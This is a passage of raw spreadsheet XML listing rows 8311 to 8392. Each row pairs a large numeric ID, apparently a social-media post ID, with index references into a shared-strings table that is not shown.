      <c r="A8311">
        <v>1.23284854668208E+18</v>
      </c>
      <c r="B8311" t="s">
        <v>20026</v>
      </c>
      <c r="C8311" t="s">
        <v>1</v>
      </c>
      <c r="D8311" t="s">
        <v>20027</v>
      </c>
      <c r="E8311" t="s">
        <v>20028</v>
      </c>
    </row>
    <row r="8312" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8312">
        <v>1.23284838208499E+18</v>
      </c>
      <c r="B8312" t="s">
        <v>20029</v>
      </c>
      <c r="C8312" t="s">
        <v>1</v>
      </c>
      <c r="D8312" t="s">
        <v>20030</v>
      </c>
      <c r="E8312" t="s">
        <v>1662</v>
      </c>
    </row>
    <row r="8313" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8313">
        <v>1.2328480409076301E+18</v>
      </c>
      <c r="B8313" t="s">
        <v>20031</v>
      </c>
      <c r="C8313" t="s">
        <v>1</v>
      </c>
      <c r="D8313" t="s">
        <v>20032</v>
      </c>
      <c r="E8313" t="s">
        <v>20033</v>
      </c>
    </row>
    <row r="8314" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8314">
        <v>1.2328478252743099E+18</v>
      </c>
      <c r="B8314" t="s">
        <v>20034</v>
      </c>
      <c r="C8314" t="s">
        <v>1</v>
      </c>
      <c r="D8314" t="s">
        <v>20035</v>
      </c>
      <c r="E8314" t="s">
        <v>111</v>
      </c>
    </row>
    <row r="8315" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8315">
        <v>1.2328463895011799E+18</v>
      </c>
      <c r="B8315" t="s">
        <v>20036</v>
      </c>
      <c r="C8315" t="s">
        <v>1</v>
      </c>
      <c r="D8315" t="s">
        <v>20037</v>
      </c>
      <c r="E8315" t="s">
        <v>20038</v>
      </c>
    </row>
    <row r="8316" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8316">
        <v>1.2328455162888699E+18</v>
      </c>
      <c r="B8316" t="s">
        <v>20039</v>
      </c>
      <c r="C8316" t="s">
        <v>1</v>
      </c>
      <c r="D8316" t="s">
        <v>20040</v>
      </c>
      <c r="E8316" t="s">
        <v>20041</v>
      </c>
    </row>
    <row r="8317" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8317">
        <v>1.2328447605970401E+18</v>
      </c>
      <c r="B8317" t="s">
        <v>20042</v>
      </c>
      <c r="C8317" t="s">
        <v>1</v>
      </c>
      <c r="D8317" t="s">
        <v>20043</v>
      </c>
      <c r="E8317" t="s">
        <v>20044</v>
      </c>
    </row>
    <row r="8318" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8318">
        <v>1.23284473133758E+18</v>
      </c>
      <c r="B8318" t="s">
        <v>20045</v>
      </c>
      <c r="C8318" t="s">
        <v>1</v>
      </c>
      <c r="D8318" t="s">
        <v>20046</v>
      </c>
      <c r="E8318" t="s">
        <v>20047</v>
      </c>
    </row>
    <row r="8319" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8319">
        <v>1.2328441391646001E+18</v>
      </c>
      <c r="B8319" t="s">
        <v>20048</v>
      </c>
      <c r="C8319" t="s">
        <v>1</v>
      </c>
      <c r="D8319" t="s">
        <v>20049</v>
      </c>
      <c r="E8319" t="s">
        <v>10411</v>
      </c>
    </row>
    <row r="8320" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8320">
        <v>1.23284339698255E+18</v>
      </c>
      <c r="B8320" t="s">
        <v>20050</v>
      </c>
      <c r="C8320" t="s">
        <v>1</v>
      </c>
      <c r="D8320" t="s">
        <v>20051</v>
      </c>
      <c r="E8320" t="s">
        <v>20052</v>
      </c>
    </row>
    <row r="8321" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8321">
        <v>1.23284312241938E+18</v>
      </c>
      <c r="B8321" t="s">
        <v>20053</v>
      </c>
      <c r="C8321" t="s">
        <v>1</v>
      </c>
      <c r="D8321" t="s">
        <v>20054</v>
      </c>
      <c r="E8321" t="s">
        <v>20055</v>
      </c>
    </row>
    <row r="8322" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8322">
        <v>1.2328427575610299E+18</v>
      </c>
      <c r="B8322" t="s">
        <v>20056</v>
      </c>
      <c r="C8322" t="s">
        <v>1</v>
      </c>
      <c r="D8322" t="s">
        <v>20057</v>
      </c>
      <c r="E8322" t="s">
        <v>20058</v>
      </c>
    </row>
    <row r="8323" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8323">
        <v>1.2328421094613801E+18</v>
      </c>
      <c r="B8323" t="s">
        <v>20059</v>
      </c>
      <c r="C8323" t="s">
        <v>1</v>
      </c>
      <c r="D8323" t="s">
        <v>20060</v>
      </c>
      <c r="E8323" t="s">
        <v>8309</v>
      </c>
    </row>
    <row r="8324" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8324">
        <v>1.2328419457701601E+18</v>
      </c>
      <c r="B8324" t="s">
        <v>20061</v>
      </c>
      <c r="C8324" t="s">
        <v>1</v>
      </c>
      <c r="D8324" t="s">
        <v>20062</v>
      </c>
      <c r="E8324" t="s">
        <v>20063</v>
      </c>
    </row>
    <row r="8325" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8325">
        <v>1.23284175864145E+18</v>
      </c>
      <c r="B8325" t="s">
        <v>20064</v>
      </c>
      <c r="C8325" t="s">
        <v>1</v>
      </c>
      <c r="D8325" t="s">
        <v>20065</v>
      </c>
      <c r="E8325" t="s">
        <v>20066</v>
      </c>
    </row>
    <row r="8326" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8326">
        <v>1.23284169504737E+18</v>
      </c>
      <c r="B8326" t="s">
        <v>20067</v>
      </c>
      <c r="C8326" t="s">
        <v>1</v>
      </c>
      <c r="D8326" t="s">
        <v>20068</v>
      </c>
      <c r="E8326" t="s">
        <v>18508</v>
      </c>
    </row>
    <row r="8327" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8327">
        <v>1.2328408570799601E+18</v>
      </c>
      <c r="B8327" t="s">
        <v>20069</v>
      </c>
      <c r="C8327" t="s">
        <v>1</v>
      </c>
      <c r="D8327" t="s">
        <v>20070</v>
      </c>
      <c r="E8327" t="s">
        <v>20071</v>
      </c>
    </row>
    <row r="8328" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8328">
        <v>1.2328406070114099E+18</v>
      </c>
      <c r="B8328" t="s">
        <v>20072</v>
      </c>
      <c r="C8328" t="s">
        <v>1</v>
      </c>
      <c r="D8328" t="s">
        <v>20073</v>
      </c>
      <c r="E8328" t="s">
        <v>20074</v>
      </c>
    </row>
    <row r="8329" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8329">
        <v>1.2328402687659E+18</v>
      </c>
      <c r="B8329" t="s">
        <v>20075</v>
      </c>
      <c r="C8329" t="s">
        <v>1</v>
      </c>
      <c r="D8329" t="s">
        <v>20076</v>
      </c>
      <c r="E8329" t="s">
        <v>11835</v>
      </c>
    </row>
    <row r="8330" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8330">
        <v>1.2328390122822899E+18</v>
      </c>
      <c r="B8330" t="s">
        <v>20077</v>
      </c>
      <c r="C8330" t="s">
        <v>1</v>
      </c>
      <c r="D8330" t="s">
        <v>20078</v>
      </c>
      <c r="E8330" t="s">
        <v>2235</v>
      </c>
    </row>
    <row r="8331" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8331">
        <v>1.23283855925153E+18</v>
      </c>
      <c r="B8331" t="s">
        <v>20079</v>
      </c>
      <c r="C8331" t="s">
        <v>1</v>
      </c>
      <c r="D8331" t="s">
        <v>20080</v>
      </c>
      <c r="E8331" t="s">
        <v>4139</v>
      </c>
    </row>
    <row r="8332" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8332">
        <v>1.2328364687349199E+18</v>
      </c>
      <c r="B8332" t="s">
        <v>20081</v>
      </c>
      <c r="C8332" t="s">
        <v>1</v>
      </c>
      <c r="D8332" t="s">
        <v>20082</v>
      </c>
      <c r="E8332" t="s">
        <v>1030</v>
      </c>
    </row>
    <row r="8333" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8333">
        <v>1.2328364648677601E+18</v>
      </c>
      <c r="B8333" t="s">
        <v>20083</v>
      </c>
      <c r="C8333" t="s">
        <v>1</v>
      </c>
      <c r="D8333" t="s">
        <v>20084</v>
      </c>
      <c r="E8333" t="s">
        <v>1030</v>
      </c>
    </row>
    <row r="8334" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8334">
        <v>1.2328352359114299E+18</v>
      </c>
      <c r="B8334" t="s">
        <v>20085</v>
      </c>
      <c r="C8334" t="s">
        <v>1</v>
      </c>
      <c r="D8334" t="s">
        <v>20086</v>
      </c>
      <c r="E8334" t="s">
        <v>1612</v>
      </c>
    </row>
    <row r="8335" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8335">
        <v>1.23283404756033E+18</v>
      </c>
      <c r="B8335" t="s">
        <v>20087</v>
      </c>
      <c r="C8335" t="s">
        <v>1</v>
      </c>
      <c r="D8335" t="s">
        <v>20088</v>
      </c>
      <c r="E8335" t="s">
        <v>1698</v>
      </c>
    </row>
    <row r="8336" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8336">
        <v>1.23283403499411E+18</v>
      </c>
      <c r="B8336" t="s">
        <v>20089</v>
      </c>
      <c r="C8336" t="s">
        <v>1</v>
      </c>
      <c r="D8336" t="s">
        <v>20090</v>
      </c>
      <c r="E8336" t="s">
        <v>1550</v>
      </c>
    </row>
    <row r="8337" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8337">
        <v>1.23283337019263E+18</v>
      </c>
      <c r="B8337" t="s">
        <v>20091</v>
      </c>
      <c r="C8337" t="s">
        <v>1</v>
      </c>
      <c r="D8337" t="s">
        <v>20092</v>
      </c>
      <c r="E8337" t="s">
        <v>20093</v>
      </c>
    </row>
    <row r="8338" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8338">
        <v>1.2328333339330601E+18</v>
      </c>
      <c r="B8338" t="s">
        <v>20094</v>
      </c>
      <c r="C8338" t="s">
        <v>1</v>
      </c>
      <c r="D8338" t="s">
        <v>20095</v>
      </c>
      <c r="E8338" t="s">
        <v>7104</v>
      </c>
    </row>
    <row r="8339" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8339">
        <v>1.23283310482336E+18</v>
      </c>
      <c r="B8339" t="s">
        <v>20096</v>
      </c>
      <c r="C8339" t="s">
        <v>1</v>
      </c>
      <c r="D8339" t="s">
        <v>20097</v>
      </c>
      <c r="E8339" t="s">
        <v>7096</v>
      </c>
    </row>
    <row r="8340" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8340">
        <v>1.23283297933821E+18</v>
      </c>
      <c r="B8340" t="s">
        <v>20098</v>
      </c>
      <c r="C8340" t="s">
        <v>1</v>
      </c>
      <c r="D8340" t="s">
        <v>20099</v>
      </c>
      <c r="E8340" t="s">
        <v>15665</v>
      </c>
    </row>
    <row r="8341" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8341">
        <v>1.2328327698033201E+18</v>
      </c>
      <c r="B8341" t="s">
        <v>20100</v>
      </c>
      <c r="C8341" t="s">
        <v>1</v>
      </c>
      <c r="D8341" t="s">
        <v>20101</v>
      </c>
      <c r="E8341" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="8342" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8342">
        <v>1.2328327218496799E+18</v>
      </c>
      <c r="B8342" t="s">
        <v>20102</v>
      </c>
      <c r="C8342" t="s">
        <v>1</v>
      </c>
      <c r="D8342" t="s">
        <v>4177</v>
      </c>
      <c r="E8342" t="s">
        <v>20103</v>
      </c>
    </row>
    <row r="8343" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8343">
        <v>1.23283191440847E+18</v>
      </c>
      <c r="B8343" t="s">
        <v>20104</v>
      </c>
      <c r="C8343" t="s">
        <v>1</v>
      </c>
      <c r="D8343" t="s">
        <v>20105</v>
      </c>
      <c r="E8343" t="s">
        <v>10634</v>
      </c>
    </row>
    <row r="8344" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8344">
        <v>1.2328306513358899E+18</v>
      </c>
      <c r="B8344" t="s">
        <v>20106</v>
      </c>
      <c r="C8344" t="s">
        <v>1</v>
      </c>
      <c r="D8344" t="s">
        <v>20107</v>
      </c>
      <c r="E8344" t="s">
        <v>10795</v>
      </c>
    </row>
    <row r="8345" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8345">
        <v>1.23283006891486E+18</v>
      </c>
      <c r="B8345" t="s">
        <v>20108</v>
      </c>
      <c r="C8345" t="s">
        <v>1</v>
      </c>
      <c r="D8345" t="s">
        <v>1073</v>
      </c>
      <c r="E8345" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="8346" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8346">
        <v>1.2328296898000699E+18</v>
      </c>
      <c r="B8346" t="s">
        <v>20109</v>
      </c>
      <c r="C8346" t="s">
        <v>1</v>
      </c>
      <c r="D8346" t="s">
        <v>20110</v>
      </c>
      <c r="E8346" t="s">
        <v>20111</v>
      </c>
    </row>
    <row r="8347" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8347">
        <v>1.23282948323903E+18</v>
      </c>
      <c r="B8347" t="s">
        <v>20112</v>
      </c>
      <c r="C8347" t="s">
        <v>1</v>
      </c>
      <c r="D8347" t="s">
        <v>20113</v>
      </c>
      <c r="E8347" t="s">
        <v>495</v>
      </c>
    </row>
    <row r="8348" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8348">
        <v>1.23282868423234E+18</v>
      </c>
      <c r="B8348" t="s">
        <v>20114</v>
      </c>
      <c r="C8348" t="s">
        <v>1</v>
      </c>
      <c r="D8348" t="s">
        <v>20115</v>
      </c>
      <c r="E8348" t="s">
        <v>15576</v>
      </c>
    </row>
    <row r="8349" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8349">
        <v>1.23282808834354E+18</v>
      </c>
      <c r="B8349" t="s">
        <v>20116</v>
      </c>
      <c r="C8349" t="s">
        <v>1</v>
      </c>
      <c r="D8349" t="s">
        <v>20117</v>
      </c>
      <c r="E8349" t="s">
        <v>1828</v>
      </c>
    </row>
    <row r="8350" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8350">
        <v>1.2328277329685701E+18</v>
      </c>
      <c r="B8350" t="s">
        <v>20118</v>
      </c>
      <c r="C8350" t="s">
        <v>1</v>
      </c>
      <c r="D8350" t="s">
        <v>20119</v>
      </c>
      <c r="E8350" t="s">
        <v>20120</v>
      </c>
    </row>
    <row r="8351" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8351">
        <v>1.2328271524767099E+18</v>
      </c>
      <c r="B8351" t="s">
        <v>20121</v>
      </c>
      <c r="C8351" t="s">
        <v>1</v>
      </c>
      <c r="D8351" t="s">
        <v>20122</v>
      </c>
      <c r="E8351" t="s">
        <v>20123</v>
      </c>
    </row>
    <row r="8352" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8352">
        <v>1.2328269845872799E+18</v>
      </c>
      <c r="B8352" t="s">
        <v>20124</v>
      </c>
      <c r="C8352" t="s">
        <v>1</v>
      </c>
      <c r="D8352" t="s">
        <v>20125</v>
      </c>
      <c r="E8352" t="s">
        <v>1102</v>
      </c>
    </row>
    <row r="8353" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8353">
        <v>1.23282670380782E+18</v>
      </c>
      <c r="B8353" t="s">
        <v>20126</v>
      </c>
      <c r="C8353" t="s">
        <v>1</v>
      </c>
      <c r="D8353" t="s">
        <v>20127</v>
      </c>
      <c r="E8353" t="s">
        <v>20128</v>
      </c>
    </row>
    <row r="8354" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8354">
        <v>1.2328259130221499E+18</v>
      </c>
      <c r="B8354" t="s">
        <v>20129</v>
      </c>
      <c r="C8354" t="s">
        <v>1</v>
      </c>
      <c r="D8354" t="s">
        <v>20130</v>
      </c>
      <c r="E8354" t="s">
        <v>980</v>
      </c>
    </row>
    <row r="8355" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8355">
        <v>1.23282576668286E+18</v>
      </c>
      <c r="B8355" t="s">
        <v>20131</v>
      </c>
      <c r="C8355" t="s">
        <v>1</v>
      </c>
      <c r="D8355" t="s">
        <v>20132</v>
      </c>
      <c r="E8355" t="s">
        <v>281</v>
      </c>
    </row>
    <row r="8356" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8356">
        <v>1.23282546321678E+18</v>
      </c>
      <c r="B8356" t="s">
        <v>20133</v>
      </c>
      <c r="C8356" t="s">
        <v>1</v>
      </c>
      <c r="D8356" t="s">
        <v>20134</v>
      </c>
      <c r="E8356" t="s">
        <v>18103</v>
      </c>
    </row>
    <row r="8357" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8357">
        <v>1.23282316079551E+18</v>
      </c>
      <c r="B8357" t="s">
        <v>20135</v>
      </c>
      <c r="C8357" t="s">
        <v>1</v>
      </c>
      <c r="D8357" t="s">
        <v>20136</v>
      </c>
      <c r="E8357" t="s">
        <v>20137</v>
      </c>
    </row>
    <row r="8358" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8358">
        <v>1.23282315857248E+18</v>
      </c>
      <c r="B8358" t="s">
        <v>20135</v>
      </c>
      <c r="C8358" t="s">
        <v>1</v>
      </c>
      <c r="D8358" t="s">
        <v>20138</v>
      </c>
      <c r="E8358" t="s">
        <v>20139</v>
      </c>
    </row>
    <row r="8359" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8359">
        <v>1.2328231566222001E+18</v>
      </c>
      <c r="B8359" t="s">
        <v>20140</v>
      </c>
      <c r="C8359" t="s">
        <v>1</v>
      </c>
      <c r="D8359" t="s">
        <v>20141</v>
      </c>
      <c r="E8359" t="s">
        <v>20142</v>
      </c>
    </row>
    <row r="8360" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8360">
        <v>1.23282303029394E+18</v>
      </c>
      <c r="B8360" t="s">
        <v>20143</v>
      </c>
      <c r="C8360" t="s">
        <v>1</v>
      </c>
      <c r="D8360" t="s">
        <v>20144</v>
      </c>
      <c r="E8360" t="s">
        <v>1894</v>
      </c>
    </row>
    <row r="8361" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8361">
        <v>1.23282287803232E+18</v>
      </c>
      <c r="B8361" t="s">
        <v>20145</v>
      </c>
      <c r="C8361" t="s">
        <v>1</v>
      </c>
      <c r="D8361" t="s">
        <v>20146</v>
      </c>
      <c r="E8361" t="s">
        <v>2510</v>
      </c>
    </row>
    <row r="8362" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8362">
        <v>1.2328228302002801E+18</v>
      </c>
      <c r="B8362" t="s">
        <v>20147</v>
      </c>
      <c r="C8362" t="s">
        <v>1</v>
      </c>
      <c r="D8362" t="s">
        <v>20148</v>
      </c>
      <c r="E8362" t="s">
        <v>15148</v>
      </c>
    </row>
    <row r="8363" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8363">
        <v>1.23282261728912E+18</v>
      </c>
      <c r="B8363" t="s">
        <v>20149</v>
      </c>
      <c r="C8363" t="s">
        <v>1</v>
      </c>
      <c r="D8363" t="s">
        <v>20150</v>
      </c>
      <c r="E8363" t="s">
        <v>1105</v>
      </c>
    </row>
    <row r="8364" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8364">
        <v>1.2328212062037399E+18</v>
      </c>
      <c r="B8364" t="s">
        <v>20151</v>
      </c>
      <c r="C8364" t="s">
        <v>1</v>
      </c>
      <c r="D8364" t="s">
        <v>20152</v>
      </c>
      <c r="E8364" t="s">
        <v>2035</v>
      </c>
    </row>
    <row r="8365" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8365">
        <v>1.2328209658071401E+18</v>
      </c>
      <c r="B8365" t="s">
        <v>20153</v>
      </c>
      <c r="C8365" t="s">
        <v>1</v>
      </c>
      <c r="D8365" t="s">
        <v>20154</v>
      </c>
      <c r="E8365" t="s">
        <v>1828</v>
      </c>
    </row>
    <row r="8366" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8366">
        <v>1.2328204871782799E+18</v>
      </c>
      <c r="B8366" t="s">
        <v>20155</v>
      </c>
      <c r="C8366" t="s">
        <v>1</v>
      </c>
      <c r="D8366" t="s">
        <v>20156</v>
      </c>
      <c r="E8366" t="s">
        <v>20157</v>
      </c>
    </row>
    <row r="8367" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8367">
        <v>1.2328202771232699E+18</v>
      </c>
      <c r="B8367" t="s">
        <v>20158</v>
      </c>
      <c r="C8367" t="s">
        <v>1</v>
      </c>
      <c r="D8367" t="s">
        <v>20159</v>
      </c>
      <c r="E8367" t="s">
        <v>2021</v>
      </c>
    </row>
    <row r="8368" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8368">
        <v>1.2328197942793001E+18</v>
      </c>
      <c r="B8368" t="s">
        <v>20160</v>
      </c>
      <c r="C8368" t="s">
        <v>1</v>
      </c>
      <c r="D8368" t="s">
        <v>20161</v>
      </c>
      <c r="E8368" t="s">
        <v>10207</v>
      </c>
    </row>
    <row r="8369" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8369">
        <v>1.2328188223583601E+18</v>
      </c>
      <c r="B8369" t="s">
        <v>20162</v>
      </c>
      <c r="C8369" t="s">
        <v>1</v>
      </c>
      <c r="D8369" t="s">
        <v>20163</v>
      </c>
      <c r="E8369" t="s">
        <v>1916</v>
      </c>
    </row>
    <row r="8370" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8370">
        <v>1.23281773344574E+18</v>
      </c>
      <c r="B8370" t="s">
        <v>20164</v>
      </c>
      <c r="C8370" t="s">
        <v>1</v>
      </c>
      <c r="D8370" t="s">
        <v>20165</v>
      </c>
      <c r="E8370" t="s">
        <v>1978</v>
      </c>
    </row>
    <row r="8371" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8371">
        <v>1.2328162670080499E+18</v>
      </c>
      <c r="B8371" t="s">
        <v>20166</v>
      </c>
      <c r="C8371" t="s">
        <v>1</v>
      </c>
      <c r="D8371" t="s">
        <v>20167</v>
      </c>
      <c r="E8371" t="s">
        <v>20168</v>
      </c>
    </row>
    <row r="8372" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8372">
        <v>1.23281609514225E+18</v>
      </c>
      <c r="B8372" t="s">
        <v>20169</v>
      </c>
      <c r="C8372" t="s">
        <v>1</v>
      </c>
      <c r="D8372" t="s">
        <v>20170</v>
      </c>
      <c r="E8372" t="s">
        <v>1236</v>
      </c>
    </row>
    <row r="8373" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8373">
        <v>1.2328157122232801E+18</v>
      </c>
      <c r="B8373" t="s">
        <v>20171</v>
      </c>
      <c r="C8373" t="s">
        <v>1</v>
      </c>
      <c r="D8373" t="s">
        <v>20172</v>
      </c>
      <c r="E8373" t="s">
        <v>20173</v>
      </c>
    </row>
    <row r="8374" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8374">
        <v>1.2328153182437801E+18</v>
      </c>
      <c r="B8374" t="s">
        <v>20174</v>
      </c>
      <c r="C8374" t="s">
        <v>1</v>
      </c>
      <c r="D8374" t="s">
        <v>20175</v>
      </c>
      <c r="E8374" t="s">
        <v>580</v>
      </c>
    </row>
    <row r="8375" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8375">
        <v>1.23281521541216E+18</v>
      </c>
      <c r="B8375" t="s">
        <v>20176</v>
      </c>
      <c r="C8375" t="s">
        <v>1</v>
      </c>
      <c r="D8375" t="s">
        <v>20177</v>
      </c>
      <c r="E8375" t="s">
        <v>10502</v>
      </c>
    </row>
    <row r="8376" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8376">
        <v>1.23281507051137E+18</v>
      </c>
      <c r="B8376" t="s">
        <v>20178</v>
      </c>
      <c r="C8376" t="s">
        <v>1</v>
      </c>
      <c r="D8376" t="s">
        <v>20179</v>
      </c>
      <c r="E8376" t="s">
        <v>20180</v>
      </c>
    </row>
    <row r="8377" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8377">
        <v>1.23281487103887E+18</v>
      </c>
      <c r="B8377" t="s">
        <v>20181</v>
      </c>
      <c r="C8377" t="s">
        <v>1</v>
      </c>
      <c r="D8377" t="s">
        <v>20182</v>
      </c>
      <c r="E8377" t="s">
        <v>20183</v>
      </c>
    </row>
    <row r="8378" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8378">
        <v>1.23281478414128E+18</v>
      </c>
      <c r="B8378" t="s">
        <v>20184</v>
      </c>
      <c r="C8378" t="s">
        <v>1</v>
      </c>
      <c r="D8378" t="s">
        <v>20185</v>
      </c>
      <c r="E8378" t="s">
        <v>1102</v>
      </c>
    </row>
    <row r="8379" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8379">
        <v>1.2328137754152E+18</v>
      </c>
      <c r="B8379" t="s">
        <v>20186</v>
      </c>
      <c r="C8379" t="s">
        <v>1</v>
      </c>
      <c r="D8379" t="s">
        <v>20187</v>
      </c>
      <c r="E8379" t="s">
        <v>20188</v>
      </c>
    </row>
    <row r="8380" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8380">
        <v>1.2328134382101E+18</v>
      </c>
      <c r="B8380" t="s">
        <v>20189</v>
      </c>
      <c r="C8380" t="s">
        <v>1</v>
      </c>
      <c r="D8380" t="s">
        <v>20190</v>
      </c>
      <c r="E8380" t="s">
        <v>20191</v>
      </c>
    </row>
    <row r="8381" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8381">
        <v>1.2328131167712399E+18</v>
      </c>
      <c r="B8381" t="s">
        <v>20192</v>
      </c>
      <c r="C8381" t="s">
        <v>1</v>
      </c>
      <c r="D8381" t="s">
        <v>20193</v>
      </c>
      <c r="E8381" t="s">
        <v>78</v>
      </c>
    </row>
    <row r="8382" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8382">
        <v>1.23281262089965E+18</v>
      </c>
      <c r="B8382" t="s">
        <v>20194</v>
      </c>
      <c r="C8382" t="s">
        <v>1</v>
      </c>
      <c r="D8382" t="s">
        <v>20195</v>
      </c>
      <c r="E8382" t="s">
        <v>460</v>
      </c>
    </row>
    <row r="8383" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8383">
        <v>1.2328120248386701E+18</v>
      </c>
      <c r="B8383" t="s">
        <v>20196</v>
      </c>
      <c r="C8383" t="s">
        <v>1</v>
      </c>
      <c r="D8383" t="s">
        <v>20197</v>
      </c>
      <c r="E8383" t="s">
        <v>4885</v>
      </c>
    </row>
    <row r="8384" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8384">
        <v>1.2328118093226099E+18</v>
      </c>
      <c r="B8384" t="s">
        <v>20198</v>
      </c>
      <c r="C8384" t="s">
        <v>1</v>
      </c>
      <c r="D8384" t="s">
        <v>20199</v>
      </c>
      <c r="E8384" t="s">
        <v>20200</v>
      </c>
    </row>
    <row r="8385" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8385">
        <v>1.2328102782675599E+18</v>
      </c>
      <c r="B8385" t="s">
        <v>20201</v>
      </c>
      <c r="C8385" t="s">
        <v>1</v>
      </c>
      <c r="D8385" t="s">
        <v>20202</v>
      </c>
      <c r="E8385" t="s">
        <v>19034</v>
      </c>
    </row>
    <row r="8386" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8386">
        <v>1.23280990668141E+18</v>
      </c>
      <c r="B8386" t="s">
        <v>20203</v>
      </c>
      <c r="C8386" t="s">
        <v>1</v>
      </c>
      <c r="D8386" t="s">
        <v>20204</v>
      </c>
      <c r="E8386" t="s">
        <v>20205</v>
      </c>
    </row>
    <row r="8387" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8387">
        <v>1.2328092980629499E+18</v>
      </c>
      <c r="B8387" t="s">
        <v>20206</v>
      </c>
      <c r="C8387" t="s">
        <v>1</v>
      </c>
      <c r="D8387" t="s">
        <v>20207</v>
      </c>
      <c r="E8387" t="s">
        <v>572</v>
      </c>
    </row>
    <row r="8388" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8388">
        <v>1.2328091367750001E+18</v>
      </c>
      <c r="B8388" t="s">
        <v>20208</v>
      </c>
      <c r="C8388" t="s">
        <v>1</v>
      </c>
      <c r="D8388" t="s">
        <v>20209</v>
      </c>
      <c r="E8388" t="s">
        <v>20210</v>
      </c>
    </row>
    <row r="8389" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8389">
        <v>1.23280872529296E+18</v>
      </c>
      <c r="B8389" t="s">
        <v>20211</v>
      </c>
      <c r="C8389" t="s">
        <v>1</v>
      </c>
      <c r="D8389" t="s">
        <v>20212</v>
      </c>
      <c r="E8389" t="s">
        <v>20213</v>
      </c>
    </row>
    <row r="8390" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8390">
        <v>1.23280843278226E+18</v>
      </c>
      <c r="B8390" t="s">
        <v>20214</v>
      </c>
      <c r="C8390" t="s">
        <v>1</v>
      </c>
      <c r="D8390" t="s">
        <v>20215</v>
      </c>
      <c r="E8390" t="s">
        <v>20216</v>
      </c>
    </row>
    <row r="8391" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8391">
        <v>1.2328080053365399E+18</v>
      </c>
      <c r="B8391" t="s">
        <v>20217</v>
      </c>
      <c r="C8391" t="s">
        <v>1</v>
      </c>
      <c r="D8391" t="s">
        <v>20218</v>
      </c>
      <c r="E8391" t="s">
        <v>2096</v>
      </c>
    </row>
    <row r="8392" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8392">
        <v>1.2328075456993001E+18</v>
      </c>
      <c r="B8392" t="s">
        <v>20219</v>
      </c>
